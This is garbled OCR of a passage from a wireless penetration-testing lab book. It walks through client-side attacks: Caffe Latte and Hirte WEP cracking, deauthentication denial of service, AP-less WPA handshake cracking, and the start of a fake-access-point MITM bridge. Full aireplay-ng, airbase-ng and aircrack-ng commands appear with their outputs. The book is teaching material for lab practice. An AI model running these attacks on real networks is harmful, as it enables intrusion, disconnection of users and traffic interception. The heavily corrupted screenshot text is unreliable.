95(14336) 
0B(14080) 
CA(14336) 





Once we have enough WEP encrypted packets, ai rcrack-ng succeeds in cracking 





OANOAUBWNF OW 


a 
(D 
"o 
ct 
= 


1 
1 
1 
1 
1 
5 
1 
1 
1 
2 
1 
1 
2 


KEY FOUND! [ AB:CD:EF:AB:CD:EF:AB: 


byte(vote) 
AB(75520) 
CD (72704) 
EF (69888) 
AB (64512) 
CD (65024) 
51(58112) 
AB (67584) 
CD (65024) 
EF (67072) 
AB(59904) 
2C (58112) 
A8 (57856) 
12 (57308) 


Aircrack-ng 1.0 r1645 


[00:25:36] Tested 1285089 keys (got 48988 IVs) 


4D(56576) 
6C (60160) 
ED (58368) 
47(60416) 
7D (59904) 
6D (57856) 
A4 (58624) 
8B(58112) 
F7 (58880) 
86 (57856) 
E0(57600) 
48(57600) 
CE(55844) 


Decrypted correctly: 100% 


root@bt:~# 


90 (56320) 
7A(59904) 
EE(57600) 
B9(60416) 
43(58624) 
72(57344) 
6D(58112) 
40(57856) 
66(58624) 
41(57344) 
FB(57344) 
9F(57600) 
A4(55076) 


3A(56064) 
A0 (57088) 
AF (57344) 
5E (59392) 
F9(58112) 
CE(57088) 
FB(57856) 
D5 (57856) 
A8 (57856) 
94 (57344) 
47(56576) 
34 (56832) 
1B(54892) 


2B(55552) 
D6 (56832) 
9A (56832) 
A1(57856) 
03 (57088) 
44 (56320) 
16 (57344) 
81(57344) 
5D (57344) 
0A(56576) 
9D (56576) 
AF(56320) 
68(54784) 


CD:EF:AB:CD:EF:12 ] 


B7(55552) 
BC(56576) 
51(56320) 
82 (57600) 
EE(56576) 
5C (55808) 
A2 (57088) 
D6 (57344) 
AO (57344) 
08 (56320) 
C4(56576) 
D7 (56320) 
C0 (54784) 


BA(55552) 
C5 (56576) 
A3 (56320) 
E1(57088) 
41(56320) 
9E (55552) 
24 (56832) 
DA(57088) 
11(57088) 
25 (56064) 
17 (55552) 
8D (56064) 
66 (54748) 


CB(55552) 
1E (56320) 
C5 (56320) 
E7 (56576) 
28 (55552) 
05 (55040) 
91(56832) 
8E (55808) 
CC (56832) 
A9 (56064) 
21(55552) 
22 (55808) 
4F (54564) 
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X FEV OAK ET ES 
We were successful in retrieving the WEP key from just the wireless client without requiring 


an actual access point to be used or present in the vicinity. This is the power of the Caffe 
Latte attack. 





The attack works by bit flipping and replaying ARP packets sent by the wireless client post 
association with the fake access point created by us. These bit flipped ARP Request packets 
cause more ARP response packets to be sent by the wireless client. Note that all these 
packets are encrypted using the WEP key stored on the client. Once we are able to gather a 
large number of these data packets, ai rcrack- ng is able to recover the WEP key easily. 


Try changing the WEP key and repeat the attack. This is a difficult attack and requires some 
practice to orchestrate successfully. It would also be a good idea to use Wireshark and 
examine the traffic on the wireless network. 


We have seen De-Authentication attack in previous chapters as well in the context of the 
access point. In this chapter, we will explore the same in the context of the client. 


In the next lab, we will send De-Authentication packets to just the client and break an 
established connection between the access point and the client. 





Time for action - De-Authenticating the client 


Follow the instructions to get started: 


1. Let us first bring our access point Wireless Lab online again. Let us keep it running 
on WEP to prove that even with encryption enabled it is possible to attack the 
access point and client connection. Let us verify that the access point is up by using 
alrodump- ng: 


root@bt: — - Shell - Konsole 
session Edit View Bookmarks Settings Help 


CH 3 ][ Elapsed: 32 s ][ 2011-03-24 09:55 
BSSID PWR RXQ Beacons $Data, #/s CH MB ENC CIPHER AUTH ESSID 
00:21:91:D2:8bE:25 -19 100 291 0 0 3 54e. WEP WEP Wireless Lab 


BSSID STATION Rate Lost Packets Probes 


(not associated) : - - 9 vivek 
(not associated) . 
(not associated) - . 2 





Attacking the Client 


2. Let us connect our client to this access point as we verify it with ai rodump- ng: 


t g root(»Dt: ~ - Snell - Konsole 


|Menubn Edit View Bookmarks Settings Help 





CH 3 ][ Elapsed: 24 s ][ 2011-03-24 10:22 


BSSID PWR RXQ  Beacons Data, #/s MB ENC CIPHER AUTH ESSID 


00:21:91:D2:8E:25 -19 100 255 54e. WEP WEP Wireless 
00:25:5E:17:C8:00 -71 © 5 54 WEP WEP swapnil 
00:25:5E:17:C8:02 -72 © 3 54 OPN <length: 
00:25:5E:17:C8:01 -72 © 4 54 OPN <length: 
00:25:5E:17:C8:03 -72 0 2 54 OPN <length: 


BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -16 0 -36e 473 247 Wireless Lab,Vivek 





3. Wewillnow runairepl ay- ng to target the client and access point connection: 


ao root@bt: ~ - Shell No. 2 - Konsole 
Menu}, Edit View Bookmarks Settings Help 


rootebt:~# aireplay-ng --deauth 1 -c 60:FB:42:D5:E4:01 -a 00:21:91:D2:8E:25 mond 
10:27:19 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 3 
10:27:20 Sending 64 directed DeAuth. STMAC: [60:FB:42:D5:E4:01] [32|65 ACKs] 
root@bt :~# 

root@bt :~# 

roote@bt:~# fj 











4. Theclient gets disconnected and tries to reconnect to the access point, we can 
verify this by using Wireshark just as before: 


mond - Wireshark 


Fee Ede Yew Go Capture Analyze Statistics Telephony bois Help 


Bade cuoxe=- GV OZ 4H r FR &4»?* o 
Fher: wlan addr zz 601b:42:d5:64:01 | * | Expression... Clear Apply 


Source Destination Protoco info 
D-Link d2:8e; 25 Apple d5:e4;01 IEEE HL Oeeuthentication, 9N»108, 
Apple d5:e4:01 D-Link, d2:8e:25 IEEE &XDeauthentication, S109, 
D-Link d2:Be:7 Apple d$:e4:01 IEEE mODesxuthentication, S110, 
D-Link d2:0e:22 Apple d$:e4:01 IEEE üC.Owauthentication, $N-100, FN-O, 
Apple d5:e4:01 D-Link d2:06:25 IEEE Ol Oesuthenticatson, £N-100, FN»O, 
Apple d5;e4;01 D-Link d2:8e;25 I&EE ML Oesuthentication, SN»111, Fed, 
D-Link, d2:8e:25 &pple, d5:e4:01 IEEE BO.Deauthentication, SN»112, Fred, 
Apple d$te4:01 D-Link d2:86:25 IEEE EDeauthentication, Si=113, Fred, 
Apple d$;:e4:01 Broadcast IGG OO Probe Fequest, Siead74, PÒ, Flage- 
D-Link _d2:te:25 Apple d$:e4:01 IODE Oc Oeauthentication, $N-114, FN-O, Flags- 
D-Link d2:8e:25 &pple d5:e4:01 [GEE BO Probe Response, SNs3054, Fed, Flagss........C, OO, SSIDe*w;reless Lab* 
Apple d5:e4:01 D-Link d2:9e:25 IEEE GO Deeuthentication, SN»115, FN=0, 
D-Link d2:Ger2 Apple d$:e4:01 IEEE BO Deauthenticatión, SN»116, Fred, 
Apple d5:e4:01 D-Link d2:8e:25 IEEE moDeeuthentication, 5$N2117, Med, 
D-Link d2:0e:25 Aople d$:e4:01 IOU üUOeauthentication, $w-110, fred, 
Apple d5:e4:01 D-Link d2:90e:25 IEEE GO Deauthentication, SN*111, Fred, 
O-Link d2:8e: 25 Apple d5:e4:01 IEEE SO.Dewuthenticetion, SN»112, FFO, 
Apple d5:e4:01 D-Link d2:8e:25 IEEE &kDeauthentication, S113, FN», 
D-Link d2:8e:25 Apple « TIEFE mODeauthentication, 52114, Pred, 
Apple d$:e4:01] D-Link d2:00:25 TOO OUO Deauthentication, $7115, Pied, 

429 7,501010 D-Link d2:90:25 Apple d5:e64:01 IEEE GODeauthentication, £N9»116, Fred, F 

29 7,581011 Apple d5;e4;01 D-Link d2:8e:25 IEEE B Owauthentication, 5N»117, Freed, 

^ Frame 119: 38 bytes on wire (304 bits), 38 bytes captured {304 bits) 


> PMadiotap Header vO, Length 12 
" IUEE 002.1] Deauthentication, Flags: 


Typea/Subtype: Deauthantication (On0c) 


P Frame Control; OxOOCO (Normal 
Duration: 314 
Destination address: Apple d*5:e4:01 (60:!b:42:d5:e4:01] 
Source address: D-Lirh d2:9e:25 (00:21:91:42:00:25] 
GSS Id: D-Link d2:9€9:25 (00:21:91:d2:06:25 
Fragment number; O 
Sequence number: O 
> IEEE 802.11] wireless LAN management {rane 
D OO Oc OO O4 mo CO OO o2 OO 10 OO cO CO 


60 fb 42 d5 es 


Be 25 00 00 07 (€ 


D| Ale: *itmprtwresharkoooodLuThE* 6 Profile: Def auk 
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5. We have now seen that even in the presence of WEP encryption, it is possible to 


De-Authenticate a client and disconnect it. The same is valid even in the presence of 
WPA/WPA2. Let us now set our access point to WPA encryption and verify the same. 


WIRELESS NETWORK SETTINGS 


Enable Wireless: Í | Always $) ( Add New ) 
Wireless Network Name: Wireless Lab (Also called the SSID) 
802.11 Mode: | Mixed 802.11n, 802.119 and 802.11b |) 
Enable Auto Channel Scan: L 
Wireless Channel: | 2.422 GHz - CH 3 -$ 
Transmission Rate : | Best (automatic) -$J (Mbit/s) 


Channel Width: | 20 MHz 
Visibility Status: ® Visible © Invisible 














WIRELESS SECURITY MODE 


To protect your privacy you can configure wireless security features. This device supports three 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original 
wireless encryption standard. WPA provides a higher level of security. WPA-Persona! does not require 
an authentication server. The WPA-Enterprise option requires an external RADIUS server. 


Security Mode: | WPA-Personal B) 





Use WPA or WPA2 mode to achieve a balance of strong security and best compatibility. This mode 
uses WPA for legacy clients while maintaining higher security with stations that are WPA2 capable. 
Also the strongest cipher that the client supports will be used. For best security, use WPA2 Only 
mode. This mode uses AES(CCMP) cipher and legacy stations are not allowed access with WPA 
security. For maximum compatibility, use WPA Only. This mode uses TKIP cipher. Some gaming and 
legacy Gevices work only in this mode. 


To achieve better wireless performance use WPA2 Only security mode (or in other words AES 
cipher). 





WPA Mode : | WPA2 Only BE 
Cipher Type: AES) 


Group Key Update Interval: 3600 (seconds) 


PRE-SHARED KEY 


Enter an 8- to 63-character alphanumeric pass-phrase. For good security it should be of ample 
length and should not be a commonly known phrase. 


Pre-Shared Key : 


eee SÉ 


= —— 
personal information. 


Enable Auto Channel Scan 
so that the router can 
select the best possible 
channel for your wireless 
network to operate on. 


Enabling Hidden Mode is 
another way to secure 
your network. With this 
option enabled, no 
wireless clients will be able 
to see your wireless 
network when they scan 
to see what's available. 
For your wireless devices 
to connect to your router, 
you will need to manually 
enter the Wireless 
Network Name on each 
device. 


If you have enabled 
Wireless Security, make 
sure you write down the 
Key or Passphrase that 
you have configured. You 
will need to enter this 
information on any 
wireless device that you 
connect to your wireless 
network. 





Attacking the Client 


6. 


Let's connect our client to the access point and ensure it is connected: 


ee - Konsole 


Sesion Edit View Bookmarks Settings Help 


CH 3 ][ Elapsed: 16 s ][ 2011-03-24 10:56 


BSS8ID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:21:91:D2:8E:25 -17 96 166 5 6 3 54e. WPA2 CCHP PSK Wireless Lab 


B55ID STATION PHR Rate Lost Packets Probes 


3 nkna 
3 Sunny 
138 Wireless Lab,Vivek 


88:25:5E:7D:76:5D 
88:156:EA:7F:C9:1A 
&8:FB:42:D5:E4:01 


-72 
-72 
-8 


(not associated) 
(not associated) 
D00:21:91:D2:8E:25 





Z: 


Let us now runai replay- ng to disconnect the client from the access point: 


root@bt: ~ - Shell No. 2 - Konsole 


Session Edit View Bookmarks 


root@bt:~# aireplay-ng --deauth 1 -c 60:FB:42:D5:E4:01 -a 00:21:91:D2:8E:25 monð 
10:51:36 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 3 
10:51:36 Sending 64 directed DeAuth. STMAC: [60:FB:42:D5:E4:01] [13|64 ACKs] 
root@bt:-~# 

root@bt:~# 

root@bt:~# 

root@bt:~# ll 


Settings Help 





8. 





Using Wireshark we can once again verify that this works as well: 


Menuet yew Go 
e aida à - uk ec 


Capture Analyze 


Fiter: wan addr == 6035:42:5:94:01 


Time 
198 9.514050 
200 9.516311 
201 9.516451 
204 9.573068 
205 9.522046 
206 9.522249 
207 9. 
208 9. 
210 9. 
211 9. 
213 8. 
214 5. 
215 9. 
216 9. 
21? 9. 
218 9. 
219 9. 
221 9. 
J22 9. 
224 9. 
225 9. 


2276 9. 


No. 


525277 
5286589 
530929 
534289 
536574 
539704 
539709 
539708 
539709 
539710 
539711 
542065 
242191 
548992 
549741 


549743 


^ Frame 3: 58 bytes on wire (440 bats), 56 bytes captured [449 bits) 
> Mediotap Meader vO, Length 26 


Source 
Apple_d5:e4:01 
D-Link d2:8e:25 
Apple d5:e4:01 
D-Link d2:8e:25 
D-Link d2:8e:25 
Apple d5:e4:01 
Apple d$:e4:01 
D-Link d2:8e:25 
Apple d$:e4:01 
D-Link d2:8e:25 
Apple d5:e4:01 
D-Link d2:88:25 
Apple d$:e4;01 
D-Link d2:8e:25 
Apple_dS:e4:01 
D-Link d2:8e:25 
Apple d5:e4:01 
D-Link d2:86:25 
Apple d$:e4;01 
D-Link d2:8e:25 
D-Link d2:8e:25 
Apple d5:e4;01 


Statistics 


Telephony Tools 


Help 


* 00700 


= | pression.. 


Destination 
D-Link d2:8e:25 
Apple d$:e4:01 
D-Link d2:98e:25 
Apple d5:e4:01 
Appla d5:a4:01 
D-Link d2:86:25 
D-Link d2:8e:25 
Apple d$:e4:01 
D-Link d2:9e:25 
Apple d5:e4;01 
D-Link d2:8e:25 
Apple d5:04:01 
O-Link d2:90«:25 
Apple d5:e4:01 
D-Link d2:90:25 
Apple d5:e4:01 
D-Link d2:8a:25 
Apple 15:24:01 
D-Link d2:0e;:25 
Apple d$:e4:01 
Apple d5:e4:01 
D:Link d2:8e:25 


mond - Wireshark 


Elias $= AH aM: 


Apply 


Clear 


Protoco | info 


ite 
IESE 
IESE 
IFEE 
TEE E 
Toon 
1per 
IEEE 
IEEE 
IEEE 
IPFE 
IPFE 
iLtL 
IEEE 
IESE 
TEE 
IPFE 
IPFE 
10L 
IEEE 
IEEE 
IEEE 


SNz5, 
SN=H, 
S$N-7, 
SN«B, 
SN*6, 


SN-7, 


FNzO, 
FNzD, 
FN=0, 
FN=0, 
FN=0, 
FWH-0, 


BO Deauthentication, 
BO Desuthentication, 
80, Deauthentication, 
BO Deauthentication, 
go Deauthenti cation, 
DOi Desuthentscation, 
BOX Desuthentication, 
BO. Desuthentication, 
BO, Deauthentication, 
B Deautnenti cation, 


PEO, 
FNz9, 
Peo, F 
FN:O, 


SN=10, 
$N«11, 
SN«12, 
BO Deauthentication, SN-13, 
BOX Deauthentscation, 
OO Desuthentication, 
BO. Desuthentication, 
BO Deauthentication, 
BX Deauthenti cation, 
BO Deauthentication, 


€Nz10, 
$Nz11, 
SN=12, 
SN*13, 
£N-14, 
SN-15, 


SN=16, 


FNzO, 
Reo, 
Fed, 
wO, 
RX Deauthenti cation, Flags- 

Flags- 
oO, Flagsz 


OO. Deauthentication, 
Bo Desuthentication, 
BO Deasauthentication, 5SN-14, 
&EXDeauthentication, SN«15, 


v IEEE 802.11 QoS Null function (No data), Flags: ....A..TC 
Type/Subtype: QoS Null function {No date) (Ox2x) 


* Frame Control: OxO9*cB (Normal) 

Duration: 258 

OSS Id: D-Lirk d2:80:25 [00:21:91:d2:89:25) 
Source address: Aople d5:e4:01 [60:1b:42:d5:e4:01) 
Destination address: D-Link d2:8e:28 (00:21:91:d2:8e:28) 
Fragment number: Ô 

480 

> Frame check sequence: OraecSO19a [correct] 


Sequence number: 


2 90 oo 2f 48 OO CQ 
10 30 76 09 cO OO f6 01 
d2 we 25 60 fb a2 d5 


D le 907 OO ae c5 01 93 


13 & 
00 00 cB 
#4 01 QO 21 91 d2 Be 2$ 


70 32 02 00 OO QO 


09 o2 O01 OO 21 


3 file: *&mpiwiresharkóooXseOdaG* 


Profile: Defauk. 
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* FEV OA RT H 
We just learnt how to disconnect a wireless client selectively from an access point using De- 
Authentication frames even in the presence of encryption schemas like WEP/WPA/WPA2. 
This was done by sending a De-Authentication packet to just the access point - client pair, 
instead of sending a broadcast De-Authentication to the entire network. 








In the preceding exercise, we used a De-Authentication attack to break the connection. Try 
using a Dis-Association packet to break the established connection between a client and an 
access point. 


XR SW 


We've already seen how to conduct the Caffe Latte attack. The Hirte attack extends the Caffe 
Latte attack using fragmentation techniques and allows for almost any packet to be used. 


More information on the Hirte attack is available on the AIRCRACK-NG website: ht t p: / / 
www. aircrack-ng.org/doku. php?id=hirte. 


We will now use ai rcrack-ng to conduct the Hirte attack on the same client. 





Time for action - cracking WEP with the Hirte attack 


1. Create a WEP access point exactly as in the Caffe Latte attack using the ai rbase-ng 
tool. The only additional option is the - N option instead of the - L option to launch 
the Hirte attack: 


vi (8 root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:-# airbase-ng -c 3 -a 00:21:91:D2:8E:25 -e "Wireless Lab" -Ww 1 -N monO 
21:32:14 Created tap interface at0 
21:32:14 Trying to set MTU on atO0 to 1500 


21:32:14 Trying to set MTU on monO to 1800 
21:32:14 Access Point with BSSID 00:21:91:D2:8E:25 started. 





AV VR 


Attacking the Client 


2. Startairodump- ng in a separate window to capture packets for the Wireless 
Lab Honeypot: 


root@bt: ~ - Shell No. 2 - Konsole 


Session Edit View Bookmarks 


Settings 


Help 





rootebt:-# airodump-ng -c 3 --bssid 00:21:91:D2:8E:25 --write Hirte mono 





3. hAirodump- ng will now start monitoring this network and storing the packets in 
Hirte-01.cap file. 


root@bt: ~ - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 





CH 3 ][ Elapsed: 16 s ][ 2011-06-27 21:34 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:21:91:D2:8E:25 0 100 386 0 0 3 54 WEP WEP Wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 





4. Once the roaming client connects to out Honeypot AP, the Hirte attack is 
automatically launched by ai rbase- ng: 


r @ root@bi: = - Shell - Konsole 


Session 


21:32: 


View Bookmarks ‘Settings Help 


Trying to set MTU on moné to 1806 
Access Point with BSSID 66:21:91:D2:8E:25 started. 


140 bytes keystream: 60:FB:42:D5:E4:01 
from 60:FB:42:D5:E4: 
from j 
from 

from 

from 

from 

from 

from 

from 

from 


from | 


Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 


Starting Hirte attack 


against 60:FB: 


associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 


dv vi 


: "Wireless 
: "Wireless 
: "Wireless 
; "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
; "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 


106 pps. 
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5. Westartaircrack-ng as inthe case of the Caffe Latte attack and eventually the 
key would be cracked as shown next: 


root@bt: ~ - Shell - Konsole <3> 


Session Edit View Bookmarks Settings Help 


Aircrack-ng 1.0 r1645 


[00:25:36] Tested 1285089 keys (got 48988 IVs) 


byte(vote) 


90 (56320) 
7A(59904) 
EE(57600) 
B9(60416) 
58624) 
57344) 
58112) 


BA(55552 
C5(56576 
A3(56320 
E1(57088 
41(56320 
9E(55552 


CB(55552 
1E(56320 
C5(56320 
E7(56576 
28(55552 


Lon a 
Cc QO hJ LJ 


57856) DA(57088 
58624) 11(57088 
57344) 25(56064 
57344) 17(55552 
57600) 8D(56064 
55076) 66(54748 


66 
41 
FB 
9F 
A4 


A9 (56064 
21(55552 
22(55808 
4F(54564 


NJ HÀ HJ NJ) H^ RP PUP RPP Pe 


) ) 
) ) 
) ) 
) ) 
) ) 
) ) 
24(56832) ) 
) ) 
) ) 
) ) 
) ) 
) ) 
) ) 


KEY FOUND! [ AB:CD:EF:AB:CD:EF:AB:CD:EF:AB:CD:EF:12 ] 
Decrypted correctly: 100% 


root@bt :~# 








"e 
> | BS 


We launched the Hirte attack against a WEP client which was isolated and away from the 
authorized network. We cracked the key exactly as in the Caffe Latte attack case. 


X 39€ 04V 
^^ 4 ANON 





We would recommend setting different WEP keys on the client and trying this exercise a 
couple of times to gain confidence. You may notice many times that you have to reconnect 
the client to get it to work. 


In a previous chapter, we have seen how to crack WPA/WPA2 PSK using ai rcrack-ng. The 
basic idea was to capture a four-way WPA handshake and then launch a dictionary attack. 


The million dollar questions is—would it be possible to crack WPA-Personal with just the 
client? No access point! 


OX sk 


Attacking the Client 


Let's revisit the WPA cracking exercise to jog our memory. 


supplicant —- Authenticator 
e — Probe Request-Response 


e ————————— €—À À À HÀ — € —À ——" 


Authentication RR, Association RR 


Pre-Shared Key 256 bit Pre-Shared Key 256 bit 


Bi. 


Io 














Key Installed 


Key Installed 





To crack WPA, we need the following four parameters from the Four-Way Handshake— 
Authenticator Nounce, Supplicant Nounce, Authenticator MAC, Supplicant MAC. Now the 
interesting thing is that we do not need all of the four packets in the handshake to extract 
this information. We can get this information with either all four packets, or packet 1 and 2, 
or just packet 2 and 3. 


In order to crack WPA-PSK, we will bring up a WPA-PSK Honeypot and when the client 
connects to us, only Message 1 and Message 2 will come through. As we do not know the 
passphrase, we cannot send Message 3. However, Message 1 and Message 2 contain all the 
information required to begin the key cracking process. 


Authentication RR, Association RR 
Pre-Shared Key 256 bit | 


Message 1... 
^. ANounce 


WPA/WPA2 PSK 
Dictionary Attack 

















Message 2 
snounce + MIC 





ACY 
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Time for action — AP-less WPA cracking 


1. We will setup a WPA-PSK Honeypot with the ESSID Wireless Lab. The -z 2 option 
creates a WPA-PSK access point which uses TKIP: 





Fi fe) root@bt: ~ - Shell - Konsole 


Menuþn Edit View Bookmarks Settings Help 


rootabt:-# airbase-ng -c 3 -a 00:21:91:D2:8E:25 -e "Wireless Lab" -Ww 1 -z 2 monO 
Created tap interface at0 
Trying to set MTU on atO to 1500 
Trying to set MTU on monO to 1800 
Access Point with BSSID 00:21:91:D2:8E:25 started. 








2. Let'salsostartai rodump- ng to capture packets from this network: 


root@bt: ~ - Shell No. 2 - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:-# airodump-ng -c 3 --bssid 00:21:91:D2:8b:25 --write AP-less-WPA-cracking mond ]i 





3. Now when our roaming client connects to this access point, it starts the handshake 
but fails to complete it after Message 2 as discussed previously: 


na root@bt: ~ - Shell - Konsole 


|Menup Edit View Bookmarks Settings Help 


lroot@bt:~# airbase-ng -c 3 -a 00:21:91:D2:8E:25 -e "Wireless Lab" -Ww 1 -z 2 monO 
23:56: Created tap interface at0 

23:56: Trying to set MTU on at® to 1500 

23:56: Access Point with BSSID 00:21:91:D2:8E:25 started. 





23: 
123: 
123: 
123: 

23: 
123: 
123: 
123: 
123: 

23: 
123: 
|123: 
123: 


Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 


associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 


(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 
(WPA1; TKIP) 


AOA 


to 
to 
to 
to 


: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
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4. Butairodump- ng reports that the handshake has been captured: 


m m root@bt: ~ - Shell No. 2 - Konsole 


Menu, Edit View Bookmarks Settings Help 





CH 3 ][ Elapsed: 1 min ][ 2011-06-27 23:57 ][ WPA handshake: 00:21:91:D2:8E:25 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
00:21:91:D2:8E:25 0 100 1254 34 0 3 54 WPA TKIP PSK Wireless Lab 
BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -18 0 73 





5. Weruntheai rodump- ng capture file through ai rcrack- ng with the same 
dictionary file as before, eventually the passphrase is cracked as shown next: 


8 root@bt: ~ - Shell - Konsole <2> 
Session Edit View Bookmarks Settings Help 





Aircrack-ng 1.0 r1645 


00] 176 keys tested (382.44 k/s) 


KEY FOUND! [ Ria. | 


Master Key ri E5 
D6 F3 


Transient Key : 1B AF 


EAPOL HMAC 
rootebt:~# l 





TVG 
We were able to crack the WPA key with just the client. This was possible because even with 


just the first two packets, we have all the information required to launch a dictionary attack 
on the handshake. 
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We would recommend setting different WEP keys on the client and trying this exercise a 
couple of times to gain confidence. You may notice many times that you have to reconnect 
the client to get it to work. 


1. What encryption key can Caffe Latte attack recover? 


a. 
b. 


d. 


None 
WEP 
WPA 
WPA2 


2. AHoneypot access point would typically use: 


a. 
b. 


d. 


No Encryption, Open Authentication 
No Encryption, Shared Authentication 
WEP Encryption, Open Authentication 


None of the above 


3. Which one of the following are DoS Attacks? 


a. 
b. 
C. 
d. 


Mis-Association attack 
De-Authentication attacks 
Dis-Association attacks 
Both (b) and (c) 


4. A Caffe Latte attack requires 


a. 
b. 


C. 


a 


That the wireless client be in radio range of the access point 
That the client contains a cached and stored WEP key 

WEP encryption with at least 128 bit encryption 

Both (a) and (c) 


2 $$$ 


Attacking the Client 


OORT 


In this chapter, we have learned that even the wireless client is susceptible to attacks. These 
include the following— Honeypot and other Mis-Association attacks, Caffe Latte attack to 
retrieve the key from the wireless client, De-Authentication and Dis-Association attacks 
causing a Denial of Service, Hirte attack as an alternative to retrieving the WEP key from a 
roaming client, and finally cracking the WPA-Personal passphrase with just the client. 


In the next chapter, we will use all our learning until now to conduct various advanced 
wireless attacks on both the client and infrastructure side. So, quickly flip the page to the 
next chapter! 


work 
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"To know your enemy, you must become your enemy." 
al Sun Tzu, Art of War 


"^ As a penetration tester, it is important to know the advanced attacks a 
hacker could do, even if you might not check or demonstrate them during 
a penetration test. This chapter is dedicated to how a hacker could conduct 
advanced attacks using wireless access as the starting point. 


In this chapter, we will look at how we can conduct advanced attacks using what we have 
learned till now. We will primarily focus on Man-in-the-Middle (MITM) attack, which 
requires a certain amount of skill and practice to conduct successfully. Once we have done 
this, we will use this MITM attack as a base to conduct more sophisticated attacks such as 
Eavesdropping and Session Hijacking. 


We will cover the following: 


@ Man-in-the-Middle attack 
€ Wireless Eavesdropping using MITM 
€ Session Hijacking using MITM 


MITM attacks are probably one of most potent attacks on a WLAN system. There are 
different configurations that can be used to conduct the attack. We will use the most 
common one—the attacker is connected to the Internet using a wired LAN and is creating 

a fake access point on his client card. This access point broadcasts an SSID similar to a local 
hotspot in the vicinity. A user may accidently get connected to this fake access point (or can 
be forced to using the higher signal strength theory we discussed in the previous chapters) 
and may continue to believe that he is connected to the legitimate access point. 


Advanced WLAN Attacks 


The attacker can now transparently forward all the user's traffic over the Internet using the 
bridge he has created between the wired and wireless interfaces. 


In the following lab exercise, we will simulate this attack. 


Time for action —Man-in-the-Middle attack 


Follow these instructions to get started: 





1. Tocreate the Man-in-the-Middle attack setup, we will first c create a soft access 
point called mi t m on the hacker laptop using ai rbase- ng. We run the command 
alrbase-ng --essid mitm -c 11 mond: 


root@bt: ~ - Shell - 
Edit View Bookmarks Settings Help 


rootabt:-# alrbase-ng --essid mitm -c 11 mon 

07:52:16 Created tap interface até 

07:52:16 Trying to set MTU on atO to 1500 

07:52:16 Access Point with BSSID 00:C0:CA:3E:BD:93 started. 





2. Itisimportant to note that ai rbase- ng when run, creates an interface at 0 (tap 
interface). Think of this as the wired-side interface of our software-based access 
point mi t m. 


root@bt: ~ - Shell No. 2 - Kons: 
Edit View Bookmarks Settings Help 


rootabt:~# ifconfig até 

até Link encap:Ethernet HWaddr 00:c0:ca:3e:bd:93 
BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 


TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:500 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


root@bt:~# 
rootebt:~# fj 
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3. Let us now create a bridge on the hacker laptop, consisting of the wired (et h0) and 
wireless interface (at 0). The succession of commands used for this are—br ct | 
addbr mitm-bridge,brct! addif mtm-bridge eth0,brct! addif mtm 
bridge atO,ifconfig ethO0 0.0.0.0 up, ifconfig at0 0.0.0.0 up: 


Lr root@bt: ~ - Shell No. 2 - K 


|Menubn Edit View Bookmarks Settings Help 


rootebt:~# ifconfig at0 

ato Link encap:Ethernet HWaddr 00:c0:ca:3e:bd:93 
BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:500 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 





brctl addbr mitm-bridge 


brctl addif mitm-bridge ethd 


brctl addif mitm-bridge at 


ifconfig ethO 0.0.0.0 up 


ifconfig at0 0.0.0.0 up 





4. \Necanassign an IP address to this bridge and check the connectivity with the 
gateway. Please note that we could do the same using DHCP as well. We can assign 
an IP address to the bridge interface with the command—i f config mi t m- 
bridge 192.168.0.199 up. We can then try pinging the gateway 192.168.0.1 
to ensure we are connected to the rest of the network: 


root@bt: ~ - Shell No. 2 - Konso 
| Session Edit View Bookmarks Settings Help 





root@bt :~# 
root@bt :~# 
rootabt:-# ping 192.168.0. 


8.0 

168 

0.1: icmp seq-1 ttl-64 time=0.557 ms 

.0.1: icmp seq-2 ttl-64 time-1.11 ms 
0.1: icmp seq-3 ttl-64 time-0.915 ms 
0.1: icmp seq-4 ttl-64 time-0.873 ms 

64 bytes from 0.1 

"£t 

--- 192.168.0.1 ping statistics --- 

5 packets transmitted, 5 received, 0% packet loss, time 4001ms 

rtt min/avg/max/mdev - 0.539/0.800/1.119/0.224 ms 

root@bt :~# 

root@bt:~# lj 


: icmp seq-5 ttl-64 time-0.539 ms 
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5. Let us now turn on IP Forwarding in the kernel so that routing and packet forwarding 
